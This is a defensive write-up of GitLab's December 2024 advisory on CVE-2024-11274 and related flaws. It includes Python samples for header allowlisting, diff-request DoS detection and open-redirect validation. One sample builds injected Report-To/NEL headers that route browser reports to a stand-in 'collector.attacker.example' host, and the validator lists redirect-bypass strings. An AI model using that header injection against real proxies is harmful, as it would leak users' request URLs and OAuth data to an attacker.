GitLab Issues Security Advisory for Multiple Vulnerabilities

Quick take - GitLab issued a security advisory on December 11, 2024, covering multiple vulnerabilities in its Community and Enterprise Editions, the most serious of which is an account takeover flaw rated high (CVSS 8.7). Users are urged to update to the patched versions to mitigate risks such as account takeovers and denial of service attacks.

Fast Facts

  • GitLab issued a security advisory on December 11, 2024, addressing multiple vulnerabilities in both Community Edition (CE) and Enterprise Edition (EE) releases prior to the patched versions.
  • The issues include Account Takeover (ATO), Denial of Service (DoS), Session Hijacking, Open Redirect, and Information Disclosure; the ATO flaw, tracked as CVE-2024-11274, is rated high with a CVSS score of 8.7.
  • Users are urged to upgrade GitLab CE and EE to the patched versions 17.6.2, 17.5.4, or 17.4.6 to mitigate these risks.
  • GitLab recommends enabling Content Security Policy (CSP) to reduce Cross-Site Scripting (XSS) risks and encourages participation in the HackerOne bug bounty program.
  • Administrators should regularly monitor logs, particularly GraphQL logs, to minimize potential exposure of sensitive information.

GitLab Issues Security Advisory for High-Severity Vulnerabilities

On December 11, 2024, GitLab issued a significant security advisory detailing multiple vulnerabilities affecting both its Community Edition (CE) and Enterprise Edition (EE). These vulnerabilities pose serious risks, including potential account takeovers and denial of service attacks. Users and administrators are urged to review the advisory and implement necessary updates to protect their systems.

High-Severity Vulnerabilities Identified

The advisory highlights several vulnerabilities reported by security researchers through GitLab’s HackerOne bug bounty program. The most severe is an Account Takeover (ATO) vulnerability involving the injection of Network Error Logging (NEL) headers into Kubernetes proxy responses. NEL and Report-To headers tell a browser where to send reports about requests to the origin that served them, so an attacker who can inject them into a response served from the GitLab origin can route those reports, which include request URLs, to a collector they control. According to the advisory, this can be used to manipulate OAuth flows and gain unauthorized access to user accounts.
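The general hazard behind this class of bug is a proxy that copies upstream response headers through to the client. The following Python is an added example, not GitLab's code or its fix: it contrasts a pass-through proxy with one that only forwards an allowlist of headers, and shows what an injected Report-To/NEL pair would instruct a browser to do. The allowlist, the header names in the sample response and the collector URL are assumptions constructed for the example.

```python
import json

# Response headers that tell a browser where to send reports about requests
# to this origin. Forwarding them from an untrusted upstream lets that upstream
# choose the collector, and NEL reports carry the full request URL.
REPORTING_HEADERS = frozenset({"nel", "report-to", "reporting-endpoints"})

# Headers a proxy normally needs to pass back for a file or API response.
# This allowlist is an assumption for the example, not GitLab's list.
ALLOWED_HEADERS = frozenset({
    "content-type", "content-length", "content-disposition",
    "cache-control", "etag", "last-modified",
})


def forward_headers_unsafe(upstream_headers):
    """Vulnerable pattern: copy every upstream header into the proxied response."""
    return dict(upstream_headers)


def forward_headers_safe(upstream_headers):
    """Hardened pattern: copy only allowlisted headers, never reporting headers."""
    kept = {}
    for name, value in upstream_headers.items():
        lname = name.lower()
        if lname in ALLOWED_HEADERS and lname not in REPORTING_HEADERS:
            kept[name] = value
    return kept


def report_collectors(response_headers):
    """Return the collector URLs a browser would be told to use by these headers.

    Report-To is a JSON object naming a group and its endpoints; NEL refers to
    that group via "report_to". This helper handles a single Report-To group.
    """
    headers = {k.lower(): v for k, v in response_headers.items()}
    if "nel" not in headers or "report-to" not in headers:
        return []
    try:
        nel = json.loads(headers["nel"])
        group = json.loads(headers["report-to"])
    except ValueError:
        return []
    if nel.get("report_to") != group.get("group"):
        return []
    return [ep["url"] for ep in group.get("endpoints", []) if "url" in ep]


# Constructed upstream response headers: a plausible file response plus
# injected reporting headers pointing at an attacker-chosen collector.
UPSTREAM_HEADERS = {
    "Content-Type": "application/octet-stream",
    "Content-Length": "42",
    "Report-To": json.dumps({
        "group": "exfil",
        "max_age": 86400,
        "endpoints": [{"url": "https://collector.attacker.example/report"}],
    }),
    # success_fraction 1.0 asks the browser to report successful requests too,
    # so ordinary page loads (and their URLs) would be reported, not just errors.
    "NEL": json.dumps({"report_to": "exfil", "max_age": 86400, "success_fraction": 1.0}),
}


if __name__ == "__main__":
    print("unsafe proxy tells browser to report to:",
          report_collectors(forward_headers_unsafe(UPSTREAM_HEADERS)))
    print("safe proxy tells browser to report to:",
          report_collectors(forward_headers_safe(UPSTREAM_HEADERS)))
```

The allowlist approach is the important design choice: a denylist of known reporting headers would miss the next header that changes browser behaviour, whereas an allowlist only ever forwards what the proxy has decided is safe.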

Another issue is a Denial of Service (DoS) vulnerability. Attackers can exploit this by sending repeated unauthenticated requests for diff files, overwhelming the system and rendering it unavailable to legitimate users.
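Until an instance is patched, the pattern described above is visible in the request log. The following Python is an added example, not part of the advisory or GitLab's tooling: it scans lines in the shape of GitLab's production_json.log (one JSON object per request with "time", "remote_ip", "username" and "path" fields) and reports addresses that make many anonymous requests for .diff or .patch files within a sliding window. The sample log lines, the addresses and the thresholds are constructed for the example.

```python
import json
from datetime import datetime, timedelta, timezone


def _line(ts, ip, path, username):
    # Constructed sample line in the shape of production_json.log; real lines
    # carry many more fields, only these are used here.
    return json.dumps({
        "method": "GET", "path": path, "status": 200,
        "time": ts.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
        "remote_ip": ip, "username": username,
    })


_T0 = datetime(2024, 12, 12, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = "\n".join(
    # 25 anonymous diff fetches from one address, one per second
    [_line(_T0 + timedelta(seconds=i), "203.0.113.7",
           f"/acme/widgets/-/merge_requests/{i}.diff", None) for i in range(25)]
    # a signed-in user pulling diffs at the same rate (not the pattern we want)
    + [_line(_T0 + timedelta(seconds=i), "203.0.113.9",
             f"/acme/widgets/-/merge_requests/{i}.diff", "alice") for i in range(25)]
    # a few anonymous diff fetches: normal browsing
    + [_line(_T0 + timedelta(seconds=i * 20), "198.51.100.4",
             "/acme/widgets/-/commit/0123abc.diff", None) for i in range(3)]
    # anonymous, but not a diff
    + [_line(_T0 + timedelta(seconds=i), "203.0.113.7", "/acme/widgets", None)
       for i in range(10)]
)

DIFF_SUFFIXES = (".diff", ".patch")


def parse_events(log_text):
    """Yield (time, remote_ip) for unauthenticated requests for diff/patch files."""
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        try:
            rec = json.loads(raw)
        except ValueError:
            continue  # skip malformed lines rather than aborting the scan
        if rec.get("username") is not None:
            continue  # authenticated request: subject to per-user limits
        if not rec.get("path", "").endswith(DIFF_SUFFIXES):
            continue
        ts = datetime.fromisoformat(rec["time"].replace("Z", "+00:00"))
        yield ts, rec.get("remote_ip", "?")


def find_bursts(log_text, window_seconds=60, threshold=10):
    """Return {ip: peak_count} for addresses whose anonymous diff requests in any
    window of window_seconds reach threshold."""
    by_ip = {}
    for ts, ip in parse_events(log_text):
        by_ip.setdefault(ip, []).append(ts)
    window = timedelta(seconds=window_seconds)
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        peak = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # slide the window forward
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[ip] = peak
    return bursts


if __name__ == "__main__":
    for ip, count in find_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {count} anonymous diff requests within 60s")
```

Threshold and window should be tuned against a baseline from the instance's own logs; a CI system fetching diffs anonymously is a legitimate source of this pattern and belongs on an allowlist rather than in an alert.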

Additional Security Concerns

Other notable vulnerabilities include Session Hijacking via the misuse of the CI_JOB_TOKEN. This could enable attackers to impersonate victims by obtaining their GitLab session tokens. An Open Redirect Vulnerability in the releases API can be exploited to divert users to malicious websites, facilitating phishing attacks. Additionally, an Information Disclosure vulnerability could leak branch names from confidential repositories, exposing sensitive project details.
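For the open redirect class mentioned above, the defence is to validate the redirect target before issuing the redirect. The following Python is an added example, not GitLab's code or its fix for the releases API: it accepts only same-host absolute URLs or path-absolute references, and rejects the usual bypasses. The allowed host name and the sample targets are assumptions constructed for the example.

```python
from urllib.parse import urlparse


def is_safe_redirect(target, allowed_host):
    """Return True only if target stays on allowed_host.

    Accepts an absolute http(s) URL whose host is exactly allowed_host, or a
    path-absolute reference such as "/acme/widgets/-/releases/v1.0".
    Rejects the usual open-redirect tricks: other hosts, other schemes,
    scheme-relative "//host", the "/\\host" form that browsers normalise to
    "//host", userinfo spoofing "https://allowed@evil", and control characters.
    Ports are deliberately not compared; add that check if the deployment
    serves more than one port.
    """
    if not target:
        return False
    if any(c.isspace() or ord(c) < 0x20 for c in target):
        return False
    parsed = urlparse(target)
    if parsed.scheme:
        if parsed.scheme.lower() not in ("http", "https"):
            return False  # javascript:, data:, etc.
        if parsed.username is not None or parsed.password is not None:
            return False  # "https://gitlab.example@evil.example/"
        return (parsed.hostname or "").lower() == allowed_host.lower()
    if parsed.netloc:
        return False  # "//evil.example/path"
    if not target.startswith("/"):
        return False  # relative references resolve against the current path
    if len(target) > 1 and target[1] in "/\\":
        return False  # "//" and "/\" both become scheme-relative in browsers
    return True


def redirect_target(requested, allowed_host, fallback="/"):
    """Return requested if it is safe to redirect to, otherwise the fallback."""
    return requested if is_safe_redirect(requested, allowed_host) else fallback


if __name__ == "__main__":
    for candidate in ("/acme/widgets/-/releases/v1.0",
                      "https://gitlab.example/acme/widgets",
                      "//evil.example/",
                      "/\\evil.example/",
                      "https://gitlab.example@evil.example/"):
        print(candidate, "->", redirect_target(candidate, "gitlab.example"))
```

Comparing the parsed hostname rather than doing a string prefix check is what defeats targets such as "https://gitlab.example.evil.example/" and "https://gitlab.example@evil.example/", both of which start with the allowed host name.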

Technical Details and Affected Versions

The account takeover flaw is tracked as CVE-2024-11274 and carries a CVSS score of 8.7, indicating high severity; the other issues in the advisory are tracked separately. For CVE-2024-11274, affected versions are all GitLab CE/EE releases from 16.1 up to 17.4.5, 17.5 up to 17.5.3, and 17.6 up to 17.6.1.

To mitigate these risks, GitLab strongly recommends upgrading to the following patched versions:

  • GitLab Community Edition (CE) and Enterprise Edition (EE): 17.6.2, 17.5.4, 17.4.6.

In addition to upgrading, GitLab advises enabling Content Security Policy (CSP) to reduce Cross-Site Scripting (XSS) attack risks related to HTML injection vulnerabilities. Users are encouraged to participate in the HackerOne bug bounty program to report any discovered vulnerabilities, contributing to ongoing security improvements.

Administrators should also regularly review and monitor logs, particularly GraphQL logs, for any sensitive information that may have been retained, ensuring potential exposure is minimized.

GitLab’s advisory underscores the critical importance of timely updates and maintaining security vigilance to protect against vulnerabilities that can significantly impact user security and system integrity.
